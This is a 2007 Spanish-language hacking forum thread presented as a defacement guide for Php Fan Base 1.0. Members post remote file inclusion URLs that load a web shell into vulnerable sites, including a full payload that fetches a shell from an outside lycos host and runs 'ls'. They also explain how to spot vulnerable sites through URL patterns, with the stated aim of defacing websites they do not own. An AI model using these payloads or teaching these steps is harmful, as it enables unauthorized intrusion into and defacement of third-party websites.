[Guia-Deface] Php Fan Base 1.0 [Guia-Deface]

Pr0gr4mer
Colaborador

Desconectado

Mensajes: 865

Pr0gr4mer al mango

[Guia-Deface] Php Fan Base 1.0 [Guia-Deface] - Pr0gr4mer

« en: Febrero 20, 2007, 07:50:41 »


	En línea

Tu respuesta esta dandole click al
Necesitas ser usuario para ver los enlaces Crear Usuario Hacer Sesion

San Buscador

.::Pr0gr4mer::.

OzX
Moderación
Gran Colaborador

Desconectado

Mensajes: 2151

http://foro.undersecurity.net

Re: [Guia-Deface] Php Fan Base 1.0 [Guia-Deface] - Pr0gr4mer

« Respuesta #1 en: Febrero 21, 2007, 02:38:52 »

RFI , remote file inclucion Cheesy

Código:

protection.php?action=logout&siteurl=MISHELL

creo que el problema radica en el $include () protection, que llama cuando uno se sale del sitio o no?


	En línea

Necesitas ser usuario para ver los enlaces Crear Usuario Hacer Sesion

'Oryon'
Miembro

Desconectado

Mensajes: 28

Vale más poder vivir que solo buscar ver el sol.

Re: [Guia-Deface] Php Fan Base 1.0 [Guia-Deface] - Pr0gr4mer

« Respuesta #2 en: Febrero 21, 2007, 05:53:42 »


	En línea

"La inteligencia se construye usandola".

Pr0gr4mer
Colaborador

Desconectado

Mensajes: 865

Pr0gr4mer al mango

Re: [Guia-Deface] Php Fan Base 1.0 [Guia-Deface] - Pr0gr4mer

« Respuesta #3 en: Febrero 22, 2007, 12:40:24 »

Cita de: OzX [NuKe] en Febrero 21, 2007, 02:38:52

RFI , remote file inclucion Cheesy

Código:

protection.php?action=logout&siteurl=MISHELL

creo que el problema radica en el $include () protection, que llama cuando uno se sale del sitio o no?

Claro... es RFI y el problema esta en que no definen la variable protection... de esa forma se puede entrar con la shell pero ademas no esta bien configurada la parte de logeo entonces la salto con un codigo cortito en el cual como vos decis indica si entras o salis del sitio.

Por lo que pregunto el otro user no recuerdo su nombre xD jejeje... mira al hacer rfi puedes usar cualquier shell pero es dificil crear una propia... tienes que tener muchos conocimientos por eso es mejor usa las de otros... por eso te ofresco la mia amigo Cheesy

Pr0gr4mer
Pr0gr4mer


	En línea

Tu respuesta esta dandole click al
Necesitas ser usuario para ver los enlaces Crear Usuario Hacer Sesion

San Buscador

.::Pr0gr4mer::.

'Oryon'
Miembro

Desconectado

Mensajes: 28

Vale más poder vivir que solo buscar ver el sol.

Re: [Guia-Deface] Php Fan Base 1.0 [Guia-Deface] - Pr0gr4mer

« Respuesta #4 en: Febrero 22, 2007, 02:20:27 »

:)Que tal, preguntaba lo de como crearme una shell porque me parece un abuso que alguien llegue como si nada y se valga de algo que no le pertenece. Pero ya que me ofreces la tuya bueno, gracias, aprecio tu generosidad y en vista de que si se puede revisar otra web con esta shell, entonces me pondre a intentar a ver que resultado obtengo.

Saludos.


	En línea

"La inteligencia se construye usandola".

'Oryon'
Miembro

Desconectado

Mensajes: 28

Vale más poder vivir que solo buscar ver el sol.

Re: [Guia-Deface] Php Fan Base 1.0 [Guia-Deface] - Pr0gr4mer

« Respuesta #5 en: Febrero 22, 2007, 03:25:14 »


	En línea

"La inteligencia se construye usandola".

Pr0gr4mer
Colaborador

Desconectado

Mensajes: 865

Pr0gr4mer al mango

Re: [Guia-Deface] Php Fan Base 1.0 [Guia-Deface] - Pr0gr4mer

« Respuesta #6 en: Febrero 22, 2007, 08:27:44 »


	En línea

Tu respuesta esta dandole click al
Necesitas ser usuario para ver los enlaces Crear Usuario Hacer Sesion

San Buscador

.::Pr0gr4mer::.

'Oryon'
Miembro

Desconectado

Mensajes: 28

Vale más poder vivir que solo buscar ver el sol.

Re: [Guia-Deface] Php Fan Base 1.0 [Guia-Deface] - Pr0gr4mer

« Respuesta #7 en: Febrero 22, 2007, 09:49:37 »


	En línea

"La inteligencia se construye usandola".

Pr0gr4mer
Colaborador

Desconectado

Mensajes: 865

Pr0gr4mer al mango

Re: [Guia-Deface] Php Fan Base 1.0 [Guia-Deface] - Pr0gr4mer

« Respuesta #8 en: Febrero 23, 2007, 04:45:34 »

Es facil... mira....

En la guia que hice yo la vulnerabilidad se encuentra en la variable protection... y en lo que vos me mostras:
Necesitas ser usuario para ver los enlaces Crear Usuario Hacer Sesion[script] el bug esta en la variable fuction entonces lo q haces es... una ves que encontras una web cuya terminacion sea
Necesitas ser usuario para ver los enlaces Crear Usuario Hacer Sesion

www.laweb.com/elindex/fuction.php?gbpfad=TUSHELL

listo.... ya podes joder a la web o darte la cabeza contra el monitor al ver que no tiene permisos de escritura Cheesy

Pr0gr4mer


	En línea

Tu respuesta esta dandole click al
Necesitas ser usuario para ver los enlaces Crear Usuario Hacer Sesion

San Buscador

.::Pr0gr4mer::.

'Oryon'
Miembro

Desconectado

Mensajes: 28

Vale más poder vivir que solo buscar ver el sol.

Re: [Guia-Deface] Php Fan Base 1.0 [Guia-Deface] - Pr0gr4mer

« Respuesta #9 en: Marzo 02, 2007, 05:35:00 »


	En línea

"La inteligencia se construye usandola".

Pr0gr4mer
Colaborador

Desconectado

Mensajes: 865

Pr0gr4mer al mango

Re: [Guia-Deface] Php Fan Base 1.0 [Guia-Deface] - Pr0gr4mer

« Respuesta #10 en: Marzo 03, 2007, 04:31:56 »


	En línea

Tu respuesta esta dandole click al
Necesitas ser usuario para ver los enlaces Crear Usuario Hacer Sesion

San Buscador

.::Pr0gr4mer::.

-Blink-
Colaborador

Desconectado

Mensajes: 595

!VivaChileMierda!

Re: [Guia-Deface] Php Fan Base 1.0 [Guia-Deface] - Pr0gr4mer

« Respuesta #11 en: Marzo 03, 2007, 05:13:29 »

Wenas
Estube leyendo y me parecio interesante asiq empese a probar peor la mayoria de las paginas a las que entro al ponerles
"/protection.php?action=logout&siteurl=http://www.usuarios.lycos.es/hackercito15/cmd/tool25.doc?&list=1&cmd=ls"
me llevan al Index de la pagina, estonses Estoy haciendo algo mal yo o es porque la pagina no es vulnerable?
Quiero asegurarme altiro para no perder tiempo

Salu2!

PD: Buena guia!


	En línea

Pr0gr4mer
Colaborador

Desconectado

Mensajes: 865

Pr0gr4mer al mango

Re: [Guia-Deface] Php Fan Base 1.0 [Guia-Deface] - Pr0gr4mer

« Respuesta #12 en: Marzo 05, 2007, 01:16:02 »

Cita de: -Blink- en Marzo 03, 2007, 05:13:29

Las webs q seguramente son vulnerables por lo menos a la shell (despues se ve si tiene o no permisos) tienen al final members.php?id=all entonces tu borras esa parte y copias la de protection... me comprendes??? si te redirecciona al index no es q estas haciendo algo mal si no que la web no tiene fallos, o bien la variable esta definida y no te deja entrar via shell.

Pr0gr4mer


	En línea

Tu respuesta esta dandole click al
Necesitas ser usuario para ver los enlaces Crear Usuario Hacer Sesion

San Buscador

.::Pr0gr4mer::.

-Blink-
Colaborador

Desconectado

Mensajes: 595

!VivaChileMierda!

Re: [Guia-Deface] Php Fan Base 1.0 [Guia-Deface] - Pr0gr4mer

« Respuesta #13 en: Marzo 05, 2007, 01:42:16 »

Ok. Muchas grasias necesitava aclararme esa duda
Lo mas problable era que no sean vulnerables porque ahora que lo miro sale "powered phpfanbase 2.0" en la parte de abajo

Salu2!


	En línea

Pr0gr4mer
Colaborador

Desconectado

Mensajes: 865

Pr0gr4mer al mango

Re: [Guia-Deface] Php Fan Base 1.0 [Guia-Deface] - Pr0gr4mer

« Respuesta #14 en: Marzo 06, 2007, 11:32:50 »

Cita de: -Blink- en Marzo 05, 2007, 01:42:16

Ok. Muchas grasias necesitava aclararme esa duda
Lo mas problable era que no sean vulnerables porque ahora que lo miro sale "powered phpfanbase 2.0" en la parte de abajo

Salu2!

Si pero no te guies por eso... aveces las 2.0 tambien son vulnerables, obviamente no todas!.

Pr0gr4mer


	En línea

Tu respuesta esta dandole click al
Necesitas ser usuario para ver los enlaces Crear Usuario Hacer Sesion

San Buscador

.::Pr0gr4mer::.

'Oryon'
Miembro

Desconectado

Mensajes: 28

Vale más poder vivir que solo buscar ver el sol.

Re: [Guia-Deface] Php Fan Base 1.0 [Guia-Deface] - Pr0gr4mer

« Respuesta #15 en: Marzo 06, 2007, 01:23:39 »


	En línea

"La inteligencia se construye usandola".

Páginas: [1]

Comunidad Underground Hispana \| Phreaking, Hacking y Seguridad \| HacK GeneraL \| Defacing \| Tema: [Guia-Deface] Php Fan Base 1.0 [Guia-Deface] - Pr0gr4mer	« anterior próximo »

	Bienvenido(a), Visitante. Favor de ingresar o registrarse. ¿Perdiste tu email de activación? - Diciembre 02, 2008, 06:16:34